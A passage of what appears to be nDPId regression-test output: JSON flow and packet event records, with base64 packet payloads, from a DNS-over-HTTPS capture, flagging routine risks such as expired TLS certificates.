DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHA
AAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1eP
ZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority 
X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
